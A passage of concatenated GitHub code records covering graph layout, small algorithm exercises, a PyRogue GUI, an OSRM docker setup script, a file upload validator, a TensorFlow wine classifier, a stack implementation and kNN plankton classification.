Symmetrize directed graphs\n if G.is_directed():\n A=A+np.transpose(A)\n pos=_sparse_spectral(A,dim)\n except (ImportError,ValueError):\n # Dense matrix\n A=nx.to_numpy_matrix(G, weight=weight)\n # Symmetrize directed graphs\n if G.is_directed():\n A=A+np.transpose(A)\n pos=_spectral(A,dim)\n\n pos=_rescale_layout(pos,scale)\n return dict(zip(G,pos))\n\n\ndef _spectral(A, dim=2):\n # Input adjacency matrix A\n # Uses dense eigenvalue solver from numpy\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"spectral_layout() requires numpy: http://scipy.org/ \")\n try:\n nnodes,_=A.shape\n except AttributeError:\n raise nx.NetworkXError(\\\n \"spectral() takes an adjacency matrix as input\")\n\n # form Laplacian matrix\n # make sure we have an array instead of a matrix\n A=np.asarray(A)\n I=np.identity(nnodes,dtype=A.dtype)\n D=I*np.sum(A,axis=1) # diagonal of degrees\n L=D-A\n\n eigenvalues,eigenvectors=np.linalg.eig(L)\n # sort and keep smallest nonzero\n index=np.argsort(eigenvalues)[1:dim+1] # 0 index is zero eigenvalue\n return np.real(eigenvectors[:,index])\n\ndef _sparse_spectral(A,dim=2):\n # Input adjacency matrix A\n # Uses sparse eigenvalue solver from scipy\n # Could use multilevel methods here, see Koren \"On spectral graph drawing\"\n try:\n import numpy as np\n from scipy.sparse import spdiags\n except ImportError:\n raise ImportError(\"_sparse_spectral() requires scipy & numpy: http://scipy.org/ \")\n try:\n from scipy.sparse.linalg.eigen import eigsh\n except ImportError:\n # scipy <0.9.0 names eigsh differently \n from scipy.sparse.linalg import eigen_symmetric as eigsh\n try:\n nnodes,_=A.shape\n except AttributeError:\n raise nx.NetworkXError(\\\n \"sparse_spectral() takes an adjacency matrix as input\")\n\n # form Laplacian matrix\n data=np.asarray(A.sum(axis=1).T)\n D=spdiags(data,0,nnodes,nnodes)\n L=D-A\n\n k=dim+1\n # number of Lanczos vectors for ARPACK solver.What is the right scaling?\n ncv=max(2*k+1,int(np.sqrt(nnodes)))\n # return smallest k eigenvalues and eigenvectors\n eigenvalues,eigenvectors=eigsh(L,k,which='SM',ncv=ncv)\n index=np.argsort(eigenvalues)[1:k] # 0 index is zero eigenvalue\n return np.real(eigenvectors[:,index])\n\n\ndef _rescale_layout(pos,scale=1):\n # rescale to (0,pscale) in all axes\n\n # shift origin to (0,0)\n lim=0 # max coordinate for all axes\n for i in range(pos.shape[1]):\n pos[:,i]-=pos[:,i].min()\n lim=max(pos[:,i].max(),lim)\n # rescale to (0,scale) in all directions, preserves aspect\n for i in range(pos.shape[1]):\n pos[:,i]*=scale/lim\n return pos\n\n\n# fixture for nose tests\ndef setup_module(module):\n from nose import SkipTest\n try:\n import numpy\n except:\n raise SkipTest(\"NumPy not available\")\n try:\n import scipy\n except:\n raise SkipTest(\"SciPy not available\")\n","repo_name":"miniBloq/v0.83","sub_path":"source/Bin/Minibloq/lang/PPythonWin/v2.7.5.1/App/Lib/site-packages/networkx/drawing/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":15348,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"3"} +{"seq_id":"71990811603","text":"def main():\n print(solution(\t[3, 0, 6, 1, 5])) # 6,5,3,1,0\n\ndef solution(citations):\n # citations.sort()\n # return citations[(len(citations)-1)//2]\n\n citations.sort()\n n = len(citations)\n for i in range (n):\n if citations[i] >= n-i:\n return n-i\n return 0\n \nif __name__ == \"__main__\":\n main()","repo_name":"da-in/algorithm-study","sub_path":"Programmers - 고득점 Kit/[정렬] H-Index/seungyeon.py","file_name":"seungyeon.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"1858048128","text":"#!/usr/bin/env python\n#-----------------------------------------------------------------------------\n# Title : PyRogue GUI module\n#-----------------------------------------------------------------------------\n# File : pyrogue/gui/_gui.py\n# Author : Ryan Herbst, rherbst@slac.stanford.edu\n# Created : 2016-09-29\n# Last update: 2016-09-29\n#-----------------------------------------------------------------------------\n# Description:\n# Python code for pyrogue GUI\n#-----------------------------------------------------------------------------\n# This file is part of the rogue software platform. It is subject to \n# the license terms in the LICENSE.txt file found in the top-level directory \n# of this distribution and at: \n# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. \n# No part of the rogue software platform, including this file, may be \n# copied, modified, propagated, or distributed except according to the terms \n# contained in the LICENSE.txt file.\n#-----------------------------------------------------------------------------\ntry:\n from PyQt5.QtWidgets import *\n from PyQt5.QtCore import *\n from PyQt5.QtGui import *\nexcept ImportError:\n from PyQt4.QtCore import *\n from PyQt4.QtGui import *\n\nimport pyrogue\nimport pyrogue.gui\nimport pyrogue.gui.variables\nimport pyrogue.gui.commands\nimport pyrogue.gui.system\nimport threading\nimport sys\n\n\ndef application(argv):\n return QApplication(argv)\n\nclass GuiTop(QWidget):\n\n newRoot = pyqtSignal(pyrogue.Root)\n newPyro = pyqtSignal(pyrogue.PyroRoot)\n\n def __init__(self,*, group,parent=None):\n super(GuiTop,self).__init__(parent)\n\n vb = QVBoxLayout()\n self.setLayout(vb)\n\n self.tab = QTabWidget()\n vb.addWidget(self.tab)\n\n self.var = pyrogue.gui.variables.VariableWidget(group=group,parent=self.tab)\n self.tab.addTab(self.var,'Variables')\n\n self.cmd = pyrogue.gui.commands.CommandWidget(group=group,parent=self.tab)\n self.tab.addTab(self.cmd,'Commands')\n self.show()\n\n self.newRoot.connect(self._addTree)\n self.newRoot.connect(self.var.addTree)\n self.newRoot.connect(self.cmd.addTree)\n\n self.newPyro.connect(self._addTree)\n self.newPyro.connect(self.var.addTree)\n self.newPyro.connect(self.cmd.addTree)\n\n self._appTop = None\n\n def addTree(self,root):\n if not root.running:\n raise Exception(\"GUI can not be attached to a tree which is not started\")\n\n if isinstance(root,pyrogue.PyroRoot):\n self.newPyro.emit(root)\n else:\n self.newRoot.emit(root)\n\n @pyqtSlot(pyrogue.Root)\n @pyqtSlot(pyrogue.PyroRoot)\n def _addTree(self,root):\n self.sys = pyrogue.gui.system.SystemWidget(root=root,parent=self.tab)\n self.tab.addTab(self.sys,root.name)\n self.adjustSize()\n\n","repo_name":"codacy-badger/rogue","sub_path":"python/pyrogue/gui/_gui.py","file_name":"_gui.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"71966539280","text":"# Regex search\r\n# 1.Get the path of the folder and regular expression;\r\n# 2.Open all .txt files in this folder and search the regex in it;\r\n# 3.Print the result to the screen.\r\n\r\nimport os\r\nimport re\r\n\r\n# 1.Path and regular expression.\r\npath = str(input('Which folder do you want to search?\\n'))\r\nregexStr = input('Which pattern do you want to search?\\n')\r\nregex = re.compile(regexStr)\r\npattern = []\r\n\r\n# 2.Search regex\r\nfor files in os.listdir(path):\r\n if files.endswith('.txt'):\r\n f = open(os.path.join(path, files))\r\n pattern += regex.findall(f.read())\r\n\r\n# 3.Print\r\nprint(pattern)\r\n","repo_name":"AzuLiu/AutomateBoringStuff","sub_path":"regexSearch.py","file_name":"regexSearch.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"6872224436","text":"import numpy as np\nfrom config import *\n\ndef data_augment(states_list,probs_list,wins_list):\n states = []\n probs = []\n for rot in range(4):\n rotated_states_list = [np.rot90(f, rot, axes=(1, 2)) for f in states_list]\n flipped_states_list = [np.flip(f,axis=-1) for f in rotated_states_list]\n rotated_probs_list = [np.rot90(f.reshape(BOARD_SIZE), rot).reshape(-1) for f in probs_list]\n flipped_probs_list = [np.flip(f.reshape(BOARD_SIZE),axis=-1).reshape(-1) for f in rotated_probs_list]\n\n states += rotated_states_list\n states += flipped_states_list\n\n probs += rotated_probs_list\n probs += flipped_probs_list\n\n return np.array(states,dtype=np.float32,),\\\n np.array(probs,dtype=np.float32),\\\n np.array(wins_list*8,dtype=np.float32).reshape(-1,1)\n\n\nclass Buffer(object):\n def __init__(self,buffer_size):\n self.state_buffer = np.zeros((buffer_size, 4,BOARD_SIZE[0], BOARD_SIZE[1]), dtype=np.float32)\n self.prob_buffer = np.zeros((buffer_size, BOARD_SIZE[0] * BOARD_SIZE[1]), dtype=np.float32)\n self.win_buffer = np.zeros((buffer_size, 1), dtype=np.float32)\n self.buffer_index = 0\n self.num_sample = 0\n self.buffer_size = buffer_size\n def append_many(self,state_a,prob_a,win_a):\n print (state_a.shape,prob_a.shape,win_a.shape)\n data_length = state_a.shape[0]\n if self.buffer_index + data_length < self.buffer_size:\n b, e = self.buffer_index, self.buffer_index + data_length\n self.state_buffer[b:e] = state_a\n self.prob_buffer[b:e] = prob_a\n self.win_buffer[b:e] = win_a\n self.buffer_index = (self.buffer_index + data_length) % self.buffer_size\n self.num_sample += data_length\n else:\n batch_1_size = self.buffer_size - self.buffer_index\n batch_2_size = data_length - batch_1_size\n\n print (\"batch_1_size\",batch_1_size)\n print (\"batch_2_size\",batch_2_size)\n\n b = self.buffer_index\n self.state_buffer[b:] = state_a[:batch_1_size]\n self.prob_buffer[b:] = prob_a[:batch_1_size]\n self.win_buffer[b:] = win_a[:batch_1_size]\n self.state_buffer[:batch_2_size] = state_a[batch_1_size:]\n self.prob_buffer[:batch_2_size] = prob_a[batch_1_size:]\n self.win_buffer[:batch_2_size] = win_a[batch_1_size:]\n self.buffer_index = batch_2_size\n self.num_sample += data_length\n\n self.num_sample = min(self.buffer_size, self.num_sample)\n def sample(self,batch_size):\n index = np.random.choice(self.num_sample,batch_size,replace=False)\n sample_states = self.state_buffer[index]\n sample_probs = self.prob_buffer[index]\n sample_wins = self.win_buffer[index]\n\n return sample_states,sample_probs,sample_wins\n\n def __len__(self):\n return self.num_sample\n\ndef get_input(game):\n while True:\n input_str = input(\"action: x,y:\\n\")\n try:\n x,y = input_str.split(',')\n x = int(x)\n y = int(y)\n except:\n print(\"Invalid format\")\n continue\n try:\n assert game.legal_positions[x,y]==True\n except AssertionError:\n print(\"Invalid position\")\n continue\n break\n return x,y","repo_name":"airaria/AlphaZero_Gomoku_WuZiQi","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"13301213976","text":"class Solution:\n def letterCombinations(self, digits):\n digitsMap = {\"0\":[], \"1\":[],\n \"2\":['a','b','c'],\n \"3\":['d','e','f'],\n \"4\":['g','h','i'],\n \"5\":['j','k','l'],\n \"6\":['m','n','o'],\n \"7\":['p', 'q', 'r', 's'],\n \"8\":['t', 'u', 'v'],\n \"9\":['w', 'x', 'y', 'z'],\n }\n retList = []\n\n def helperFunc(input, templist):\n if input == \"\":\n retList.append(templist)\n else:\n for i in range(len(digitsMap[input[0]])):\n helperFunc(input[1:], templist + digitsMap[input[0]][i])\n\n helperFunc(digits, \"\")\n return retList\n\nsol = Solution()\ninput = \"23\"\nprint(sol.letterCombinations(input))","repo_name":"adalloul0928/Leetcode_Hell","sub_path":"Archive/Facebook/Recursion/letterCombinationPhone.py","file_name":"letterCombinationPhone.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72930724881","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\ndef clicked():\r\n messagebox.showinfo('Заголовок', 'Текст')\r\nwindow = Tk()\r\n\r\nwindow.title(\"Добро пожаловать в приложение PythoneRu\")\r\nwindow.geometry('400x250')\r\nbtn = Button(window, text='Клик', command=clicked)\r\nbtn.grid(column=0, row=0)\r\nwindow.mainloop()","repo_name":"Vyacsheslav/interface","sub_path":"twelve.py","file_name":"twelve.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69793798161","text":"#coding: utf8\nfrom flask import request\nfrom farbox_bucket.utils import smart_unicode, to_int\nfrom farbox_bucket.utils.functional import cached_property\nfrom farbox_bucket.utils.url import unqote_url_path_to_unicode\nimport urllib\n\n\ndef compute_auto_pages(pages, current_page=1, max_count=10):\n # 1 ...... n\n if max_count < 6:\n max_count = 6\n if pages <= max_count:\n return range(1, pages+1)\n\n just_head = range(1, max_count-1) + [0, pages]\n just_foot = [1, 0] + range(pages-max_count+1, pages+1)\n\n if current_page in just_head and current_page!=pages:\n if current_page < max_count/2:\n return just_head\n if current_page in just_foot and current_page!=1:\n if current_page > pages-max_count/2:\n return just_foot\n\n auto_fix_count = (max_count - 2*2)/2\n head = [1, 2]\n foot = [pages-1, pages]\n _middle_list = range(current_page-auto_fix_count+1, current_page+auto_fix_count)\n middle_list = []\n for i in _middle_list:\n if 1 self.total_pages or self.page < 1:\n return []\n else:\n return self._list_object\n\n\n @cached_property\n def pre_page(self):\n return self.previous_page\n\n @cached_property\n def has_previous(self):\n return self.page > 1\n\n @cached_property\n def has_pre(self):\n return self.has_previous\n\n @cached_property\n def has_next(self):\n return self.page < self.total_pages\n\n @staticmethod\n def get_page_url(page_number):\n if '/page/' in request.url:\n base = request.path.split('/page/', 1)[0]\n else:\n base = request.path\n if page_number != 1:\n url = ('%s/page/%s' % (base, page_number)).replace('//', '/')\n else:\n url = base.replace('//', '/') or '/'\n if request.query_string:\n query_string = request.query_string\n if '%' in query_string:\n query_string = urllib.unquote(query_string)\n url += '?%s' % smart_unicode(query_string)\n url = url.replace('\"', '%22').replace(\"'\", '%27') # 避免被跨站\n return url\n\n @cached_property\n def previous_page_url(self):\n if self.has_previous:\n return self.get_page_url(self.previous_page)\n else:\n return '#'\n\n @cached_property\n def pre_page_url(self):\n return self.previous_page_url\n\n @cached_property\n def pre_url(self):\n return self.pre_page_url\n\n @cached_property\n def next_page_url(self):\n if self.has_next:\n return self.get_page_url(self.next_page)\n else:\n return '#'\n\n @cached_property\n def next_url(self):\n return self.next_page_url\n\n @cached_property\n def page_numbers(self):\n return self.get_page_numbers()\n\n def set_default_max_page_numbers(self, numbers):\n # 设定 auto_pages 计算时,最大的长度跨度\n numbers = to_int(numbers)\n if isinstance(numbers, int) and 50 > numbers > 3:\n self.default_max_page_numbers = numbers\n return ''\n\n def get_page_numbers(self, max_count=None):\n if not max_count:\n max_count = self.default_max_page_numbers\n return compute_auto_pages(self.total_pages, current_page=self.page, max_count=max_count)","repo_name":"hepochen/FarBox","sub_path":"farbox_bucket/server/utils/record_and_paginator/base_paginator.py","file_name":"base_paginator.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"3"} +{"seq_id":"30961645179","text":"import subprocess\nimport os\n\ndef main(config, logger, transport_mode, compile_osrm):\n ''' run the shell script that\n - removes the existing docker\n - downloads the osrm files\n - establishes the osrm routing docker\n '''\n logger.error('Initialize the OSRM server for {} to {} in {}'.format(transport_mode, config['services'],config['location']['city']))\n # transport mode options\n mode_dict = {'driving':'car_x','walking':'foot_x','cycling':'bicycle_x'}\n\n # pull the variables from the config file\n osm_subregion = config['OSM']['osm_subregion']\n osm_region = config['OSM']['osm_region']\n port = config['OSRM']['port']\n transport_mode = mode_dict[transport_mode]\n directory = config['OSM']['data_directory']\n state = config['location']['state']\n\n # in shell, remove any existing dockers\n shell_commands = [\n 'docker stop osrm-xmin-{}'.format(state),\n 'docker rm osrm-xmin-{}'.format(state),\n ]\n for com in shell_commands:\n subprocess.run(com.split())\n\n # download the data\n # download_data = 'wget -N https://download.geofabrik.de/{}/{}-latest.osm.pbf -P {}'.format(osm_region, osm_subregion, directory)\n # p = subprocess.run(download_data.split(), stderr=subprocess.PIPE, bufsize=0)\n # compile_osrm = '304 Not Modified' not in str(p.stderr)\n compile_osrm = True #False # \n\n # if the data does not redownload, it does not need to re-compile.\n if compile_osrm:\n logger.error('Compiling the data files')\n shell_commands = [\n # init docker data\n 'docker run -t -v {}:/data osrm/osrm-backend osrm-extract -p /data/profiles/{}.lua /data/{}-latest.osm.pbf'.format(directory, transport_mode, osm_subregion),\n 'docker run -t -v {}:/data osrm/osrm-backend osrm-partition /data/{}-latest.osrm'.format(directory, osm_subregion),\n 'docker run -t -v {}:/data osrm/osrm-backend osrm-customize /data/{}-latest.osrm'.format(directory, osm_subregion),\n ]\n for com in shell_commands:\n subprocess.run(com.split(), stdout=open(os.devnull, 'wb'))\n else:\n logger.error('Data not re-downloaded and compiled because no changes to online version')\n\n run_docker = 'docker run -d --name osrm-xmin-{} -t -i -p {}:5000 -v {}:/data osrm/osrm-backend osrm-routed --algorithm mld --max-table-size 100000 /data/{}-latest.osrm'.format(state, port, directory, osm_subregion)\n subprocess.run(run_docker.split())\n\n logger.error('OSRM server initialized')\n \n","repo_name":"urutau-nz/x-minute-city","sub_path":"src/init_osrm.py","file_name":"init_osrm.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34070427076","text":"import os\nfrom typing import List\n\nfrom werkzeug.datastructures import FileStorage\n\nfrom licenseware.common.constants import states\nfrom licenseware.common.validators.file_validators import GeneralValidator\nfrom licenseware.utils.file_utils import save_file\n\n\nclass FileContentValidator:\n def __init__(\n self,\n uploader_id: str,\n required_input_type: str = None,\n required_sheets: list = [],\n required_columns: list = [],\n text_contains_all: list = [],\n text_contains_any: list = [],\n regex_escape: bool = True,\n min_rows_number: int = 0,\n header_starts_at: int = 0,\n buffer: int = 9000,\n **kwargs\n ):\n self.uploader_id = uploader_id\n self.required_input_type = required_input_type\n self.required_sheets = required_sheets\n self.required_columns = required_columns\n self.text_contains_all = text_contains_all\n self.text_contains_any = text_contains_any\n self.regex_escape = regex_escape\n self.min_rows_number = min_rows_number\n self.header_starts_at = header_starts_at\n self.buffer = buffer\n self.kwargs = kwargs\n\n def get_file_objects_from_request(self, flask_request):\n\n file_objects: List[FileStorage] = flask_request.files.getlist(\"files[]\")\n\n bad_request = {\n \"status\": states.FAILED,\n \"message\": \"Files list is empty or files are not on 'files[]' key\",\n \"validation\": [\n {\n \"status\": states.FAILED,\n \"filename\": \"No valid files\",\n \"filepath\": \"Files not saved\",\n \"message\": \"Files list is empty or files are not on 'files[]' key\",\n }\n ],\n }, 400\n\n if not isinstance(file_objects, list):\n return bad_request\n if file_objects == []:\n return bad_request\n\n return file_objects\n\n def get_only_valid_file_objects(self, file_objects: list) -> List[str]:\n\n filenames = [f.filename for f in file_objects]\n filenames_validation_response = self.validate_filenames(filenames)\n\n valid_filenames = []\n for response in filenames_validation_response:\n if response[\"status\"] == states.SUCCESS:\n valid_filenames.append(response[\"filename\"])\n\n validation_file_objects = []\n for file in file_objects:\n if file.filename in valid_filenames:\n validation_file_objects.append(file)\n else:\n file.close()\n\n return validation_file_objects\n\n def validate_filepaths_content(self, filepaths: list):\n\n validation_response = []\n for filepath in filepaths:\n\n try:\n\n GeneralValidator(\n input_object=filepath,\n required_input_type=self.required_input_type,\n required_sheets=self.required_sheets,\n required_columns=self.required_columns,\n text_contains_all=self.text_contains_all,\n text_contains_any=self.text_contains_any,\n regex_escape=self.regex_escape,\n min_rows_number=self.min_rows_number,\n header_starts_at=self.header_starts_at,\n buffer=self.buffer,\n )\n\n validation_response.append(\n {\n \"status\": states.SUCCESS,\n \"filename\": os.path.basename(filepath),\n \"filepath\": filepath,\n \"message\": self.filename_valid_message,\n }\n )\n\n except Exception as err:\n validation_response.append(\n {\n \"status\": states.FAILED,\n \"filename\": os.path.basename(filepath),\n \"filepath\": filepath,\n \"message\": self.filename_invalid_message or str(err),\n }\n )\n\n return validation_response\n\n def validate_file_objects(self, file_objects: list, tenant_id: str) -> list:\n\n validation_response = []\n\n valid_file_objects = self.get_only_valid_file_objects(file_objects)\n\n if valid_file_objects == []:\n validation_response.append(\n {\n \"status\": states.FAILED,\n \"filename\": \"No valid filenames\",\n \"filepath\": \"File not saved\",\n \"message\": self.filename_invalid_message,\n }\n )\n return validation_response\n\n for file in valid_file_objects:\n try:\n\n GeneralValidator(\n input_object=file,\n required_input_type=self.required_input_type,\n required_sheets=self.required_sheets,\n required_columns=self.required_columns,\n text_contains_all=self.text_contains_all,\n text_contains_any=self.text_contains_any,\n min_rows_number=self.min_rows_number,\n header_starts_at=self.header_starts_at,\n buffer=self.buffer,\n )\n\n # Save validated file to disk\n filepath = save_file(file, tenant_id)\n\n validation_response.append(\n {\n \"status\": states.SUCCESS,\n \"filename\": file.filename,\n \"filepath\": filepath,\n \"message\": self.filename_valid_message,\n }\n )\n\n except Exception as err:\n validation_response.append(\n {\n \"status\": states.FAILED,\n \"filename\": file.filename,\n \"filepath\": \"File not saved\",\n \"message\": self.filename_invalid_message or str(err),\n }\n )\n\n return validation_response\n\n def get_overall_status_and_message(self, validation_response: list):\n\n status = states.SUCCESS\n message = \"Files are valid\"\n for res in validation_response:\n if res[\"status\"] == states.FAILED:\n status = states.FAILED\n message = \"Not all files are valid\"\n break\n\n status_code = 200 if status == states.SUCCESS else 400\n\n return status, message, status_code\n\n def get_file_objects_response(self, flask_request):\n \"\"\"\n receive flask_request\n validate file names and file contents\n save to disk valid files\n create json response\n \"\"\"\n\n tenant_id = flask_request.headers.get(\"Tenantid\")\n\n file_objects = self.get_file_objects_from_request(flask_request)\n if not isinstance(file_objects, list):\n return file_objects\n validation_response = self.validate_file_objects(file_objects, tenant_id)\n status, message, status_code = self.get_overall_status_and_message(\n validation_response\n )\n\n return {\n \"tenant_id\": tenant_id,\n \"status\": status,\n \"message\": message,\n \"validation\": validation_response,\n }, status_code\n","repo_name":"licenseware/licenseware-sdk-v2","sub_path":"licenseware/uploader_validator/file_content_validator.py","file_name":"file_content_validator.py","file_ext":"py","file_size_in_byte":7426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"71468031120","text":"'''\nThird project - Learning to classify wines : multiclass classification\n trying to classify wines based on their place of origin\n'''\nimport matplotlib.pyplot as plt \nimport pandas as pd \nimport tensorflow as tf \nfrom sklearn.utils import shuffle\nfrom sklearn import preprocessing\n\ndf = pd.read_csv('./wine.csv', header=0)\nprint(df.describe())\n\nfor i in range(1, 8):\n number = 420+i\n ax1 = plt.subplot(number)\n ax1.locator_params(nbins=3)\n plt.title(list(df)[i])\n ax1.scatter(df[df.columns[i]], df['Wine'])\nplt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)\n# plt.show()\n\nsess = tf.InteractiveSession()\n\nX = df[df.columns[1:13]].values\ny = df['Wine'].values-1\n\nY = tf.one_hot(indices=y, depth=3, on_value=1, off_value=0, axis=1, name='a').eval()\nX,Y = shuffle(X, Y)\n\nscaler = preprocessing.StandardScaler()\nX = scaler.fit_transform(X)\n\n# Create the model\nx = tf.placeholder(tf.float32, [None, 12])\nW = tf.Variable(tf.zeros([12, 3]))\nb = tf.Variable(tf.zeros([3]))\ny = tf.nn.softmax(tf.matmul(x, W)+b)\n\n\n# Define loss and optimizer\ny_ = tf.placeholder(tf.float32, [None, 3])\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_*tf.log(y), reduction_indices=[1]))\ntrain_step = tf.train.GradientDescentOptimizer(0.1).minimize(cross_entropy)\n\n\n# Train\ntf.global_variables_initializer().run()\nfor i in range(100):\n X,Y = shuffle(X,Y, random_state=1)\n Xtr, Ytr = X[0:140,:], Y[0:140,:]\n Xt, Yt = X[140:178,:], Y[140:178,:]\n\n Xtr, Ytr = shuffle(Xtr, Ytr, random_state=0)\n\n batch_xs, batch_ys = Xtr, Ytr\n train_step.run(feed_dict={x:batch_xs, y_:batch_ys})\n cost = sess.run(cross_entropy, feed_dict={x:batch_xs, y_:batch_ys})\n\n\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n print(accuracy.eval({x:Xt, y_:Yt}))\n","repo_name":"dezhili/My_learnings","sub_path":"ML_note/BuildingMLwithTensorflow/Chapter5/thiredproject.py","file_name":"thiredproject.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35188988165","text":"# Stack LIFO\n# ------------------------------------------------\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass Stack:\n def __init__(self):\n self.head = None\n\n# Stack Push\n# DONE\n# DONE Redo the stracture of the stack\n# ------------------------------------------------\n# Create push(val) that adds val to our stack.\n def push(self, val):\n # add new node to the end of the list\n new_node = Node(val) # create the node\n\n # handle the case where the list is empty\n current_head = self.head # added\n new_node.next = current_head\n self.head = new_node\n return self\n\n# Stack Top\n# DONE\n# DONE Empty Cast\n# DONE empact of edit the push\n# ------------------------------------------------\n# Return (not remove) the stack’s top value.\n def top(self):\n if self.head == None:\n return\n else:\n return self.head.value\n\n# Stack Is Empty\n# DONE\n# DONE Test empty case\n# ------------------------------------------------\n# Return whether the stack is empty.\n def isEmpty(self):\n return self.head == None\n\n# Stack Pop\n# DONE\n# TODO do we return the removed value or the value before it ?\n# DONE fixing after creating push method\n# ------------------------------------------------r\n# Create pop() to remove and return the top val.\n def pop(self):\n # removes and returns the last node of the list-\n if self.isEmpty():\n return\n else:\n removed = self.head.value\n self.head = self.head.next\n return removed\n\n# Stack Contains\n# DONE\n# ------------------------------------------------\n# Return whether given val is within the stack.\n def contains(self, val):\n # returns a boolean on whether or not the val is in the list\n index = self.head\n while (index):\n if (index.value == val):\n return True\n else:\n index = index.next\n return False\n\n# Stack Size\n# DONE\n# DONE Review\n# ------------------------------------------------\n# Return the number of stacked values.\n def size(self):\n count = 0\n index = self.head\n while (index):\n count += 1\n index = index.next\n return count\n\n# ------------------------------------------------\n# Added: String Method.\n# ------------------------------------------------\n def display(self):\n string = \"[\"\n index = self.head\n while (index):\n string += str(index.value)\n if(index.next):\n string += \"->\"\n index = index.next\n string += \"]\"\n return string\n\n\nif __name__ == \"__main__\":\n print('-'*90)\n print('Create Stack',)\n stack = Stack()\n print('Top values:', stack.top())\n print('-'*90)\n print('Adding 2 values:')\n print('Is empty:', stack.isEmpty(), 'The size is', stack.size())\n print('Stack after adding:', stack.push(10).push(20).display())\n print('-'*90)\n print('Is empty:', stack.isEmpty(), 'The size is', stack.size())\n print('Top values:', stack.top())\n stack.pop()\n print('Top values:', stack.top())\n stack.pop()\n print('Top values:', stack.top())\n stack.push(10).push(20)\n print('-'*90)\n print('Removing 2 values:')\n while stack.isEmpty() == False:\n print('Stack:', stack.display(), 'Top:',\n stack.top(), 'Size:', stack.size())\n print('Remove:', stack.pop())\n print('Is empty:', stack.isEmpty())\n print('Stack:', stack.display(), 'Top:',\n stack.top(), 'Size:', stack.size())\n print('Remove:', stack.pop())\n print('-'*90)\n print('Size of empty:', stack.isEmpty(), stack.size())\n print('Size of none empty:', stack.push(1).push(2).isEmpty(), stack.size())\n print('-'*90)\n print('Contains 20:', stack.contains(20))\n print('Contains 4:', stack.contains(4))\n stack.pop()\n stack.pop()\n print('Is empty:', stack.isEmpty())\n print('Contains 4:', stack.contains(4))\n print('Contains 4:', stack.push(4).contains(4))\n","repo_name":"SaudiWebDev2020/Murtada_Almutawah","sub_path":"Challenges/weekFive/dayOne.py","file_name":"dayOne.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36970540195","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 9 12:19:22 2020\n\n@author: rfuchs\n\"\"\"\n\nimport numpy as np\n\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport os \nfrom sklearn.metrics import confusion_matrix\n\n\nos.chdir('C:/Users/rfuchs/Documents/GitHub/planktonPipeline/extract_Pulse_values')\n\n# Load nomenclature\ntn = pd.read_csv('train_test_nomenclature.csv')\ntn.columns = ['Particle_class', 'label']\n\n###################################################################################################################\n# Evaluate knn : Let the whole sample, should give an advantage \n###################################################################################################################\n\nfrom viz_functions import plot_2D\nfrom time import time\nfrom scipy.integrate import trapz\nfrom sklearn.neighbors import KNeighborsClassifier\nimport pandas as pd\n\nos.chdir('C:/Users/rfuchs/Documents/cyto_classif')\n\n\n#===========================================\n# Without undersampling\n#===========================================\n\nX_train = np.load('FUMSECK_L3/X_train610.npy')\ny_train = np.load('FUMSECK_L3/y_train610.npy')\n\nX_valid = np.load('FUMSECK_L3/X_valid610.npy')\ny_valid = np.load('FUMSECK_L3/y_valid610.npy')\n\nX_test = np.load('FUMSECK_L3/X_test610.npy')\ny_test = np.load('FUMSECK_L3/y_test610.npy')\n\n# Integrate the curves\nX_train_i = trapz(X_train, axis = 1)\nX_valid_i = trapz(X_valid, axis = 1)\nX_test_i = trapz(X_test, axis = 1)\n\nknn_perfs = pd.DataFrame(columns = ['k', 'micro', 'macro', 'weighted'])\n\nfor k in range(1,10):\n print(k)\n knn = KNeighborsClassifier(n_neighbors = k)\n knn.fit(X_train_i, y_train)\n y_pred_valid = knn.predict(X_valid_i)\n knn_perfs = knn_perfs.append({'k': k, 'micro': precision_score(y_valid, y_pred_valid, average = 'micro'), \\\n 'macro': precision_score(y_valid, y_pred_valid, average='macro'), \n 'weighted': precision_score(y_valid, y_pred_valid, average='weighted')}, \n ignore_index = True)\n\nplt.plot(knn_perfs['k'], knn_perfs['micro'])\nplt.plot(knn_perfs['k'], knn_perfs['macro'])\nplt.plot(knn_perfs['k'], knn_perfs['weighted'])\n\n# k = 2 seems to be best choice !\n\n\n#===========================================\n# With undersampling\n#===========================================\n\nX_train = 